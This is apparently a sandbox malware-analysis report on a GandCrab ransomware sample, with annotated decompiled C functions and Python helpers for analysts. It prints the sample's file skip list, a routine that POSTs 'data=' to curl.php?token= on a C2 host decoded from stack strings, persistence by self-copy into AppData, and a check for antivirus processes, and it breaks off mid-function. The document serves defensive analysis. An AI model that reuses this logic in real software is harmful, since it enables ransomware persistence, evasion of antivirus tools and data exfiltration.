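KLIF_SYS = stores_from_listing([
    ("_v84", "message", 0x6c006b), ("_v84", "wParam", 0x660069),
    ("_v84", "lParam", 0x73002e), ("_v84", "time", 0x730079), ("_v84", "pt", 0),
])
KL1_SYS = stores_from_listing([
    ("_v96", None, 0x6c006b), ("_v92", None, 0x2e0031),
    ("_v88", None, 0x790073), ("_v84", "hwnd", 0x73),
])
FSDFW_SYS = stores_from_listing([
    ("_v84", "message", 0x730066), ("_v84", "wParam", 0x660064),
    ("_v84", "lParam", 0x2e0077), ("_v84", "time", 0x790073), ("_v84", "pt", 0x73),
])
# Immediates copied from the E0F9D7EF0 listing.
HOST_HEADER = stores_from_listing([
    ("_v68", None, 0x6f0048), ("_v64", None, 0x740073), ("_v60", None, 0x20003a),
    ("_v56", None, 0x6f006e), ("_v52", None, 0x6f006d), ("_v48", None, 0x650072),
    ("_v44", None, 0x610072), ("_v40", None, 0x73006e), ("_v36", None, 0x6d006f),
    ("_v32", None, 0x63002e), ("_v28", None, 0x69006f), ("_v24", None, 0x6e),
])


def decode_all():
    """Decode every stack string collected from the two listings."""
    return {name: decode_stack_string(stores) for name, stores in [
        ("E0F9D2D30 driver 1", KLIF_SYS), ("E0F9D2D30 driver 2", KL1_SYS),
        ("E0F9D2D30 driver 3", FSDFW_SYS), ("E0F9D7EF0 header", HOST_HEADER)]}


if __name__ == "__main__":
    for name, text in decode_all().items():
        print(f"{name}: {text!r}")
```

                                         Sorting by frame offset rather than by listing order is what makes the _v84 reuse come out right: the hwnd member at offset 0 follows _v88 in memory even though the decompiler prints it after the three plain locals, and the tagMSG members follow each other in declaration order.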

                                        C-Code - Quality: 93%
                                         			// Returns 1 if the file at __ecx must be left alone, 0 if it may be processed.
                                         			// Only the base name (the text after the last backslash) is compared.
                                         			E0F9D6790(WCHAR* __ecx) {
                                         				int _t4;
                                         				signed int _t5;
                                         				signed int _t15;
                                         				void* _t19;
                                         				WCHAR* _t21;
                                         				short* _t25;
                                         				WCHAR* _t26;
                                         
                                         				_t21 = __ecx;
                                         				_t4 = lstrlenW(__ecx);
                                         				_t5 = lstrlenW(_t21);
                                         				_t1 = _t21 - 2; // -2
                                         				_t25 = _t1 + _t5 * 2;        // points at the last character
                                         				_t19 = _t4 - 1;
                                         				if(_t19 != 0) {
                                         					do {                          // walk backwards to the last '\' (0x5c)
                                         						_t25 = _t25 - 2;
                                         						_t19 = _t19 - 1;
                                         					} while ( *_t25 != 0x5c && _t19 != 0);
                                         				}
                                         				// Base name. When the counter runs out without finding a backslash, _t25
                                         				// stops on the first character, so _t26 points at the second one and a
                                         				// bare file name is compared with its first character missing.
                                         				_t26 = _t25 + 2;
                                         				// Skip list: Windows housekeeping files plus the ransom note itself,
                                         				// GDCB-DECRYPT.txt (the note name of the GDCB-era GandCrab builds).
                                         				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                         					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                         						goto L5;
                                         					} else {
                                         						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
                                         						asm("sbb eax, eax");      // neg/sbb/inc idiom: yields 1 when lstrcmpiW returned 0, else 0
                                         						return  ~_t15 + 1;
                                         					}
                                         				} else {
                                         					L5:
                                         					return 1;
                                         				}
                                         			}
                                         
                                         Instruction addresses (one per decompiled line in the original report): 0x0f9d6799 .. 0x0f9d6840

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F9D69A3), ref: 0F9D679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D67A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F9D67CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F9D67E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F9D67EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F9D67FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F9D6806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F9D6812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F9D681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F9D682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0F9D6836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction ID: fb9f6914023d2799385fa6110f50e1366150e3d815b812e2cf7aedb1e735d2a3
                                        • Opcode Fuzzy Hash: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction Fuzzy Hash: 5F11E96220173E655A21367D9C42EEF119D8DC2BA4B758525F601F24C3DF85F61348F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0F9D54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                        				CHAR* _v12;
                                        				void* _v16;
                                        				CHAR** _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				void* _v32;
                                        				char _v36;
                                        				short _v136;
                                        				char _v1156;
                                        				short _v1160;
                                        				int _t45;
                                        				void* _t53;
                                        				CHAR* _t57;
                                        				CHAR* _t59;
                                        				CHAR* _t60;
                                        				void* _t61;
                                        				void* _t70;
                                        				short _t71;
                                        
                                        				_t59 = __ecx;
                                        				_v20 = __edx;
                                        				_v12 = __ecx;
                                        				E0F9D7CE0( &_v36);
                                        				_v24 = E0F9D5060();
                                        				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                        				_t7 = _t70 + 1; // 0x74cb6981
                                        				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                        				_v28 = _t60;
                                        				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                        				if(_t60 == 0) {
                                        					L2:
                                        					_t60 = 0;
                                        					L3:
                                        					lstrcatA(_t60, "data=");
                                        					lstrcatA(_t60, _v12);
                                        					asm("movdqu xmm0, [0xf9dfb20]");
                                        					asm("movdqu [ebp-0x84], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb30]");
                                        					asm("movdqu [ebp-0x74], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb40]");
                                        					asm("movdqu [ebp-0x64], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb50]");
                                        					asm("movdqu [ebp-0x54], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb60]");
                                        					asm("movdqu [ebp-0x44], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb70]");
                                        					asm("movdqu [ebp-0x34], xmm0");
                                        					lstrlenA(_t60);
                                        					_t71 = 0;
                                        					_v1160 = 0;
                                        					E0F9D9010( &_v1156, 0, 0x3fc);
                                        					lstrcpyW( &_v1160, L"curl.php?token=");
                                        					E0F9D53A0( &_v1160);
                                        					_t45 = lstrlenW( &_v136);
                                        					_t74 = _v16;
                                        					_push(_t45);
                                        					_push( &_v136);
                                        					_push(L"POST");
                                        					_push(0x31fff);
                                        					_push(_v16);
                                        					_push(lstrlenA(_t60));
                                        					_push(_t60);
                                        					_t61 = _v24;
                                        					_push( &_v1160);
                                        					_push(_t61);
                                        					if(E0F9D7EF0( &_v36) != 0) {
                                        						_t71 = 1;
                                        						if(_a4 != 0) {
                                        							_v12 = 0;
                                        							if(E0F9D5210(_t74,  &_v12) == 0) {
                                        								_t71 = 0;
                                        							} else {
                                        								_t57 = _v12;
                                        								if(_t57 != 0) {
                                        									 *_v20 = _t57;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					VirtualFree(_t61, 0, 0x8000);
                                        					VirtualFree(_v16, 0, 0x8000);
                                        					VirtualFree(_v28, 0, 0x8000);
                                        					_t53 = _v32;
                                        					if(_t53 != 0) {
                                        						InternetCloseHandle(_t53);
                                        					}
                                        					return _t71;
                                        				}
                                        				_t10 = _t70 + 1; // 0x74cb6981
                                        				if(_t70 < _t10) {
                                        					goto L3;
                                        				}
                                        				goto L2;
                                        			}

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                          • Part of subcall function 0F9D5060: Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                          • Part of subcall function 0F9D5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                          • Part of subcall function 0F9D5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                          • Part of subcall function 0F9D5060: wsprintfW.USER32 ref: 0F9D5166
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0F9D54C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0F9D54E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F9D54FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0F9D5518
                                        • lstrcatA.KERNEL32(00000000,0F9D582E), ref: 0F9D551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5572
                                        • _memset.LIBCMT ref: 0F9D558D
                                        • lstrcpyW.KERNEL32 ref: 0F9D55A1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D55B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0F9D55D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0F9D5636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D5642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D564E
                                        • InternetCloseHandle.WININET(?), ref: 0F9D5658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction ID: d06921e8be3cc22626783e33e12396159bc72395faba6ac99d49abac49619247
                                        • Opcode Fuzzy Hash: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction Fuzzy Hash: 9751F871D0130AABEB109BA4DC41FEEBB7CFF88301F648515FA44B2182DB786654CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0F9D2AD0() {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				short _v20;
                                        				WCHAR* _v24;
                                        				WCHAR* _v28;
                                        				long _v32;
                                        				intOrPtr _v36;
                                        				WCHAR* _t24;
                                        				void* _t27;
                                        				WCHAR* _t33;
                                        				WCHAR* _t38;
                                        				signed int _t40;
                                        				signed int _t46;
                                        				WCHAR* _t50;
                                        				WCHAR* _t54;
                                        				void* _t56;
                                        				WCHAR* _t57;
                                        				void* _t58;
                                        				WCHAR* _t64;
                                        				WCHAR* _t65;
                                        				WCHAR* _t67;
                                        				signed int _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        
                                        				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                        				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
                                        				_v24 = _t24;
                                        				_t64 = _t24;
                                        				_v32 = 0;
                                        				if(_t24 == 0) {
                                        					_t67 = 0;
                                        					_t50 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t3 =  &(_t24[0x101]); // 0x202
                                        					_t65 = _t3;
                                        					_v32 = 0x404;
                                        					_t50 = _t65;
                                        					_t67 = _t24;
                                        					_t64 =  &(_t65[0x101]);
                                        				}
                                        				_v28 = _t67;
                                        				GetModuleFileNameW(0, _t67, 0x100);
                                        				GetTempPathW(0x100, _t50);
                                        				_t6 =  &(_t50[1]); // 0x204
                                        				_t27 = E0F9D8090(_t67, _t6);
                                        				_t75 = _t27;
                                        				if(_t27 == 0) {
                                        					_v20 = 0x520050;
                                        					_v8 = 0;
                                        					_push(0x52);
                                        					_v16 = 0x440049;
                                        					_v12 = 0x520055;
                                        					E0F9D8150( &_v20, lstrlenW( &_v20));
                                        					_t72 = _t71 + 4;
                                        					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                        					_t13 =  &(_t50[1]); // 0x2
                                        					_t54 = _t67;
                                        					_t33 = E0F9D8090(_t54, _t13);
                                        					__eflags = _t33;
                                        					if(_t33 == 0) {
                                        						lstrcatW(_t50, L"\\Microsoft\\");
                                        						lstrcatW(_t50,  &_v20);
                                        						lstrcatW(_t50, L".exe");
                                        						_push(_t54);
                                        						_t38 = E0F9D2890(_v28, _t50);
                                        						_t72 = _t72 + 4;
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							goto L17;
                                        						}
                                        						_t40 = lstrlenW(_t50);
                                        						__eflags = _v28;
                                        						_t56 = 0xa + _t40 * 2;
                                        						if(_v28 == 0) {
                                        							L13:
                                        							_t64 = 0;
                                        							__eflags = 0;
                                        							L14:
                                        							_push(_t50);
                                        							L15:
                                        							wsprintfW(_t64, L"\"%s\"");
                                        							_t57 = _t64;
                                        							goto L16;
                                        						}
                                        						__eflags = _v36 + _t56 - 0x800;
                                        						if(__eflags < 0) {
                                        							goto L14;
                                        						}
                                        						goto L13;
                                        					}
                                        					_t46 = lstrlenW(_t67);
                                        					__eflags = _v28;
                                        					_t58 = 0xa + _t46 * 2;
                                        					if(_v28 == 0) {
                                        						L8:
                                        						_t64 = 0;
                                        						__eflags = 0;
                                        						L9:
                                        						_push(_t67);
                                        						goto L15;
                                        					}
                                        					__eflags = _v36 + _t58 - 0x800;
                                        					if(__eflags < 0) {
                                        						goto L9;
                                        					}
                                        					goto L8;
                                        				} else {
                                        					_t57 = _t67;
                                        					L16:
                                        					E0F9D2960(_t57, _t75);
                                        					L17:
                                        					ExitThread(0);
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F9D2B7D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F9D2B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F9D2BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D2BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0F9D2BF4
                                        • wsprintfW.USER32 ref: 0F9D2C35
                                        • ExitThread.KERNEL32 ref: 0F9D2C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction ID: 5bfa645b322da78216cd0de30451d37a07bd8da579e1f2a9c4deb6fbb3366e35
                                        • Opcode Fuzzy Hash: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction Fuzzy Hash: 7741F5702053119BE310DF30DC49B6B7B9CAFC4715F248828B646972C3DABCE958CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E0F9D7A10(void** _a4, intOrPtr* _a8) {
                                        				signed int _v8;
                                        				long _v12;
                                        				long _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				WCHAR* _v28;
                                        				WCHAR* _v32;
                                        				WCHAR* _v36;
                                        				WCHAR* _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				WCHAR* _v72;
                                        				WCHAR* _v76;
                                        				WCHAR* _v80;
                                        				void* _t46;
                                        				void* _t49;
                                        				WCHAR* _t56;
                                        				void** _t68;
                                        				void* _t75;
                                        				long _t76;
                                        				WCHAR* _t77;
                                        				signed int _t79;
                                        				void* _t83;
                                        
                                        				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); /* output buffer; 0x3000 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE */
                                        				_t68 = _a4;
                                        				 *_t68 = _t46;
                                        				_v80 = L"AVP.EXE";
                                        				_v76 = L"ekrn.exe";
                                        				_v72 = L"avgnt.exe";
                                        				_v68 = L"ashDisp.exe";
                                        				_v64 = L"NortonAntiBot.exe";
                                        				_v60 = L"Mcshield.exe";
                                        				_v56 = L"avengine.exe";
                                        				_v52 = L"cmdagent.exe";
                                        				_v48 = L"smc.exe";
                                        				_v44 = L"persfw.exe";
                                        				_v40 = L"pccpfw.exe";
                                        				_v36 = L"fsguiexe.exe";
                                        				_v32 = L"cfp.exe";
                                        				_v28 = L"msmpeng.exe";
                                        				_t75 = VirtualAlloc(0, 4, 0x3000, 4); /* PROCESSENTRY32W: only 4 bytes requested, works because VirtualAlloc commits a whole page */
                                        				_v24 = _t75;
                                        				if(_t75 == 0) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					 *_t75 = 0x22c; /* dwSize = sizeof(PROCESSENTRY32W) */
                                        					_t49 = CreateToolhelp32Snapshot(2, 0); /* 2 = TH32CS_SNAPPROCESS */
                                        					_v20 = _t49;
                                        					if(_t49 != 0xffffffff) {
                                        						_t79 = 0;
                                        						_push(_t75);
                                        						_v12 = 0;
                                        						_a4 = 0;
                                        						_v16 = 0;
                                        						_v8 = 0;
                                        						if(Process32FirstW(_t49) != 0) {
                                        							L6:
                                        							while(_t79 == 0) {
                                        								_t77 = _t75 + 0x24; /* &PROCESSENTRY32W.szExeFile */
                                        								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                        									_t79 = _t79 + 1;
                                        									if(_t79 < 0xe) {
                                        										continue;
                                        									} else {
                                        										_t79 = _v8;
                                        									}
                                        									L15:
                                        									_t75 = _v24;
                                        									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) { /* 0x12 = ERROR_NO_MORE_FILES */
                                        										goto L6;
                                        									}
                                        									goto L17;
                                        								}
                                        								_push(_t77);
                                        								_push( *_t68);
                                        								_v16 = 1;
                                        								if(_a4 != 0) {
                                        									lstrcatW(); /* arguments pushed above: (*_t68, _t77) */
                                        									lstrcatW( *_t68, ",");
                                        								} else {
                                        									lstrcpyW(); /* arguments pushed above: (*_t68, _t77) */
                                        									lstrcatW( *_t68, ",");
                                        								}
                                        								_a4 =  &(_a4[0]);
                                        								_v12 = _v12 + lstrlenW(_t77) * 2;
                                        								_t79 =  >  ? 1 : _v8; /* comparison operands lost by the decompiler; a non-zero value ends the outer while(_t79 == 0) loop */
                                        								_v8 = _t79;
                                        								goto L15;
                                        							}
                                        							L17:
                                        							if(_v16 != 0) {
                                        								_t56 =  *_t68;
                                        								if( *_t56 != 0) {
                                        									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                        								}
                                        							}
                                        							 *_a8 = _v12;
                                        						}
                                        						VirtualFree(_t75, 0, 0x8000); /* 0x8000 = MEM_RELEASE */
                                        						CloseHandle(_v20);
                                        						_t76 = _v16;
                                        						if(_t76 == 0) {
                                        							VirtualFree( *_t68, _t76, 0x8000);
                                        						}
                                        						return _t76;
                                        					} else {
                                        						VirtualFree(_t75, 0, 0x8000);
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D7AEF
                                        • lstrcmpiW.KERNEL32(0F9E033C,-00000024), ref: 0F9D7B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0F9D7B8E
                                        • GetLastError.KERNEL32 ref: 0F9D7B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D7BB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7BDB
                                        • CloseHandle.KERNEL32(?), ref: 0F9D7BE0
                                        • VirtualFree.KERNEL32(?,?,00008000), ref: 0F9D7BF5
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 2470459410-0
                                        • Opcode ID: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction ID: d91eadc4ebab5028d79b61ab884f1f471c505cee8502c7aabc89bbb6d883896a
                                        • Opcode Fuzzy Hash: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction Fuzzy Hash: 6E51BE71A05218EBDB218FA4D848B9EBBB8FF85724F208059F500AB2D2D7B85954CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%
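Added example (not part of the Joe Sandbox report and not code from the sample): a Python re-implementation of the matching and string-building logic of E0F9D7A10, so the exact string the sample hands back to its caller can be reproduced from a process listing taken by any other tool (tasklist output, EDR telemetry, a process list carved from a memory image). The process names in the block are constructed test data. Two details carry over from the decompilation: the length written to *_a8 counts only the matched names (lstrlenW * 2), never the commas, and lstrcmpiW compares case-insensitively, so "MsMpEng.exe" matches the table entry "msmpeng.exe". The comparison whose operands the decompiler lost (_t79 = > ? 1 : _v8) is evaluated right after that byte count is updated, and a non-zero result ends the outer while(_t79 == 0) loop; the example exposes it as an optional byte limit that is an assumption and is off by default.

```python
from typing import Iterable, List, Optional, Tuple

# The 14 image names hard-coded in E0F9D7A10, in table order (_v80 .. _v28).
AV_PROCESS_TABLE = (
    "AVP.EXE", "ekrn.exe", "avgnt.exe", "ashDisp.exe", "NortonAntiBot.exe",
    "Mcshield.exe", "avengine.exe", "cmdagent.exe", "smc.exe", "persfw.exe",
    "pccpfw.exe", "fsguiexe.exe", "cfp.exe", "msmpeng.exe",
)
assert len(AV_PROCESS_TABLE) == 0xE   # the inner loop's bound in the decompilation

# Constructed snapshot (szExeFile of each PROCESSENTRY32W, in snapshot order).
# Not taken from the report.
SAMPLE_SNAPSHOT = ["System", "smss.exe", "explorer.exe", "MsMpEng.exe",
                   "svchost.exe", "ekrn.exe"]


def gandcrab_av_hits(process_names: Iterable[str],
                     stop_after_bytes: Optional[int] = None) -> Tuple[str, int, bool]:
    """Mirror the sample's pass over a Toolhelp32 process snapshot.

    process_names     image names only (no path), as szExeFile holds them
    stop_after_bytes  ASSUMPTION: stands in for the comparison the decompiler
                      lost; None means the pass never stops early

    Returns (list_string, reported_len_bytes, found):
      list_string         what the caller receives in *_a4: matched names joined
                          by ',' with the trailing comma overwritten by a NUL
      reported_len_bytes  what the caller receives in *_a8: lstrlenW(name) * 2
                          summed over the matches only, separators not counted
      found               the function's return value (_v16); when False the
                          sample frees the buffer, so no string reaches the caller
    """
    matched: List[str] = []
    reported_len = 0
    for exe in process_names:
        # lstrcmpiW: case-insensitive comparison of the whole image name.
        if any(exe.casefold() == entry.casefold() for entry in AV_PROCESS_TABLE):
            matched.append(exe)             # the running process's own spelling is copied
            reported_len += len(exe) * 2    # _v12 += lstrlenW(_t77) * 2
            if stop_after_bytes is not None and reported_len > stop_after_bytes:
                break                       # _t79 != 0 ends while(_t79 == 0)
    found = bool(matched)
    return (",".join(matched) if found else "", reported_len, found)


if __name__ == "__main__":
    names, nbytes, found = gandcrab_av_hits(SAMPLE_SNAPSHOT)
    print(f"found={found} reported_len={nbytes} list={names!r}")
```

Because the sample copies whatever spelling the snapshot row carries, the same host can produce differently cased strings from one run to the next; when correlating this value across hosts, compare it case-insensitively.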

                                        C-Code - Quality: 16%
                                        			/* Path filter. The candidate path arrives in ecx and is handed to
                                        			   E0F9D8090 (not shown on this page) as the haystack. Returns 0 when
                                        			   the path contains one of the literal fragments below or lies under
                                        			   one of four shell special folders (CSIDL 0x2a PROGRAM_FILESX86,
                                        			   0x2b PROGRAM_FILES_COMMON, 0x24 WINDOWS, 0x1c LOCAL_APPDATA);
                                        			   otherwise returns 1. */
                                        			E0F9D6640(void* __ecx) {
